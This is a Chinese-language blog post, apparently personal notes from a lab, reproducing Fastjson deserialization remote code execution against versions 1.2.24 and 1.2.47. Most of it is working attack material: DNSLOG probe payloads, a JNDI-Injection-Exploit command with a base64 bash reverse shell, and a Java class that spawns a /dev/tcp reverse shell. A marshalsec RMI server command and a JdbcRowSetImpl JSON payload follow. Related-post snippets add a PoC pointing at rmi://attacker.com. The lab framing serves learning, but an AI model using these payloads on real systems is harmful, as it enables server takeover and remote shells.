fastjson-rce复现

已于 2023-10-07 15:30:11 修改
阅读量184 收藏 1
点赞数 1
文章标签: python 开发语言 网络安全
于 2023-09-14 15:21:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49608140/article/details/132870425
版权

首先可以用 { 测试一下看返回包有没有fastjson提示符,因为这个可以被删除所以就没试。

直接开始用DNSLOG测试看代码是否执行。具体代码如下

1.2.67版本前

{"zeo":{"@type":"java.net.Inet4Address","val":".dnslog.cn"}}

1.2.67版本后

{"@type":"java.net.Inet4Address","val":"dnslog"}

{"@type":"java.net.Inet6Address","val":"dnslog"}

畸形的

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

POC:

要嵌套在里面zeo里面

 {"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}

{"@type":"java.net.Inet4Address","val":"dnslog"}

{"@type":"java.net.Inet6Address","val":"dnslog"}

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}

{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}

Set[{"@type":"java.net.URL","val":"dnslog"}]

Set[{"@type":"java.net.URL","val":"dnslog"}

{{"@type":"java.net.URL","val":"dnslog"}:0
 

因为我开的这个靶场试1.2.24版本所以用{"zeo":{"@type":"java.net.Inet4Address","val":".dnslog.cn"}}。可以看到代码是执行了的

然后再来学习一下RCE怎么打

原理不谈,用得到再百度,先记一下操作流程免得以后又忘

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,xxxx}|{base64,-d}|{bash,-i}" -A xxx.xxx.xxx.xxx

echo后面写一个反弹shell的base64编码。反弹shell语句还有绕过还得百度,基础先用这句base64绕一下 bash -i >/dev/tcp/xxx.xxx.xxx.xxx/port 0>&1

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+L2Rldi90Y3AvMTkyLjE2OC44NS4xMzAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.85.130

这里用85.130这台机器做监听机,同时还用他来启动恶意的rmi、ldap服务

这里工具支持的JDK版本是1.7、1.8 所以要注意java版本

下面就是启动了恶意服务和监听端口

现在攻击需要的基础环境已经有了就开始想靶场发起进攻

这样基础的反弹shell就可以了。

还有一个高一点版本的1.2.47的fastjson,也几个操作笔记

首先第一步构建一个友好的java类.这里面就一个反弹shell的地址和端口要改其他不变

import java.lang.Runtime;
import java.lang.Process;
 
public class first {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.85.130:9999 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

然后javac编译一下,生成了一个first.class。为了清晰一点把这个class文件单独放到一个目录然后启动一个http服务

然后再使用工具开启rmi服务,中间的地址是刚启的http的地址,文件名前面要加个#。然后最后是指定rmi启动的端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.85.130/#first" 8888

还有要开启一个监听反弹shell的端口

万事具备了就开始来到靶场抓包,数据包注意POST传参、格式改成json,这里面的地址是rmi的地址

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.85.130:8888/first",
        "autoCommit":true
    }
}

发送数据包然后看到成功上线,就先学到这里下班

哔仔
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
技术分享 | Fastjson-RCE漏洞复现
Jeeseen123的博客
05-26 471
Fastjson提供autotype功能,允许用户在反序列化数据中通过 @type 指定反序列化的类型,其次Fastjson自定义的反序列化会调用指定类中的setter方法和部分getter方法。 当组件开启autotype并且反序列化不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。 影响版本 Fastjson1.2.47以及之前的版本 复现 1.1 环境准备 攻击机1 用于接受反弹shell 系统:Win10 x64 安装nc,burpsuit
fastjson1.2.47以下 RCE 漏洞复现
问题很多的小明
09-21 1330
author:test Ox01 具体环境 War包部署在tomcat,war包使用fastjson解析 tomcat版本 java版本 0x02 尝试是否可以接受请求(也可以没有这一步) 先尝试是否可以收到ldap请求 post数据包如下: POST /fastjson/ HTTP/1.1 Host: x.x.x.x:8080 Cache-Control: max-age=0 Upgrade...
Java - FastjsonRCE攻击模拟(远程代码执行漏洞)
Zong_0915的博客
12-03 1488
Java - FastjsonRCE问题分析及攻击模拟(远程代码执行漏洞)Fastjson出现RCE问题的必要前提分析 首先,本文的Fastjson相关的RCE问题,针对于版本在1.2.24以下的。 Fastjson出现RCE问题的必要前提分析
fastjson 反序列化RCE,远程命令执行漏洞CVE、CNVD(2022年12月最新)
qq1140037586的博客
12-18 2189
漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。
Fastjson反序列化漏洞——fastjson RCE漏洞的源头(1.2.24-rce)
最新发布
m0_71263989的博客
02-20 999
FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。近几年来fastjson漏洞层出不穷,本文将谈谈近几年来fastjson RCE漏洞的源头:17年fastjson爆出的1.2.24反序列化漏洞。以这个漏洞为基础,详细分析fastjson漏洞的一些细节问题。
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
《深入解析Fastjson-RCE漏洞及其利用》 Fastjson,作为一个高效、强大的Java语言中用于处理JSON数据的库,被广泛应用于各种系统和项目中。然而,任何软件都可能存在潜在的安全隐患,Fastjson也不例外。"fastjson-...
fastjson-1.2.54-API文档-中文版.zip
07-09
赠送jar包:fastjson-1.2.54.jar; 赠送原API文档:fastjson-1.2.54-javadoc.jar; 赠送源代码:fastjson-1.2.54-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.54.pom; 包含翻译后的API文档:fastjson-...
fastjson-1.2.76.jar
06-29
fastjson-1.2.76.jar
fastjson-1.2.72-API文档-中文版.zip
06-06
赠送jar包:fastjson-1.2.72.jar; 赠送原API文档:fastjson-1.2.72-javadoc.jar; 赠送源代码:fastjson-1.2.72-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.72.pom; 包含翻译后的API文档:fastjson-1.2....
fastjson-1.2.9.jar.zip
12-23
在标题中提到的 "fastjson-1.2.9.jar.zip" 是 Fastjson 的一个特定版本,包含的 "fastjson-1.2.9.jar" 文件是该库的可执行 JAR 包,开发者可以直接引入到项目中使用。 **JSON 解析与序列化** 1. **解析 JSON**: ...
Fastjson小于1.2.67 UnSerializable RCE分析研究
Fly_鹏程万里
05-08 2371
开篇前言 从2018年2月的第一篇文章开始到现在已经发布了946篇原创文章,时隔2年零2个月,博客粉丝达到了3000人,很是感谢大家的支持以及对笔者博客的喜爱,后续笔者也将用心撰写更加有质量的博客与广大IT领域的人员进行深度交流,为了答谢广大的粉丝,本次奉上一篇最近写的Fastjson反序列化漏洞文章,以此作为致谢~ 影响范围 Fastjson<=1.2.66 漏洞类型 反序列化导...
java rce漏洞原理_fastjsonRCE漏洞复现记录
weixin_42133753的博客
02-27 578
参考链接:0x01 漏洞复现 RMi 1. payload:{"@type":"java.lang.Class",br/>"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl""@type":"com.sun.rowset.JdbcRowSetImpl",br/>},"b":{"@type":"com.s...
红队武器库:fastjson小于1.2.68全漏洞RCE利用exp复现
热门推荐
god_Zeo的安全博客
07-04 5万+
0x01漏洞介绍 Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 0x02影响范围 Fastjson < 1.2.68 Fastjson爆出的绕过方法可以通杀1.2.68版本以下所有 0x03漏洞复现 下面以Fastjson 1.2.47 为例子,因为vulhub有现成的环境十分方便
网络安全深入学习第七课——热门框架漏洞(RCEFastjson反序列化漏洞)
p36273的博客
09-18 1661
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
Fastjson<=1.2.47-RCE反序列化漏洞(CNVD‐2019‐22238)保姆级教程
精品博客,你值得一看~
08-10 513
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件 开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也 就是通常所指的“Gadget”),则会造成一些严重的安全问题。
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1286
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
fastjson(反序列化)漏洞复现
weixin_58954236的博客
09-11 1185
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6289
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
【漏洞复现Fastjson_1.2.47_rce
过期的秋刀鱼
11-04 679
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。后可向其POST新的JSON对象,后端会利用fastjson进行解析。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。构造反弹shell,进行base64编码。将content-type修改为。即可看到一个json对象被返回。
fastjson rce复现
08-09
fastjson是一款流行的Java JSON库,但因其在解析JSON中的不安全行为而存在远程代码执行(RCE)漏洞。为了复现该漏洞,我们可以按照以下步骤进行操作: 第一步是选择一个适当的fastjson版本,建议使用较早的版本,因为新的版本通常会修复漏洞。将fastjson库添加到Java项目的依赖中。 第二步是创建一个恶意JSON字符串,该字符串中包含能够触发RCE漏洞的payload。例如,可以使用如下的JSON字符串: ``` { "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://attacker.com:1099/Exploit", "autoCommit":true } ``` 在这个例子中,我们使用了`com.sun.rowset.JdbcRowSetImpl`类作为目标,其中连接地址指向攻击者控制的RMI服务器,用于向受害系统发送恶意代码。 第三步是编写Java代码,并将上一步创建的JSON字符串作为输入传递给fastjson的解析器。以下是一个简单的示例: ```java import com.alibaba.fastjson.JSON; public class FastjsonRce { public static void main(String[] args) { String maliciousJson = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://attacker.com:1099/Exploit\",\"autoCommit\":true}"; Object parsedObject = JSON.parse(maliciousJson); } } ``` 在这个示例中,我们使用`JSON.parse`方法将JSON字符串解析为一个对象。fastjson在解析时会实例化目标类,并调用其构造函数和setter方法,从而导致RCE漏洞的利用。 第四步是运行上述Java代码,并观察是否成功复现RCE漏洞。如果目标系统受到fastjson的漏洞影响,恶意代码会在解析过程中被执行,从而使攻击者可以远程控制该系统。 需要注意的是,复现fastjson RCE漏洞仅用于研究和教育目的,并且应在法律合规和授权的情况下进行。漏洞利用是非法行为,可能导致严重的法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值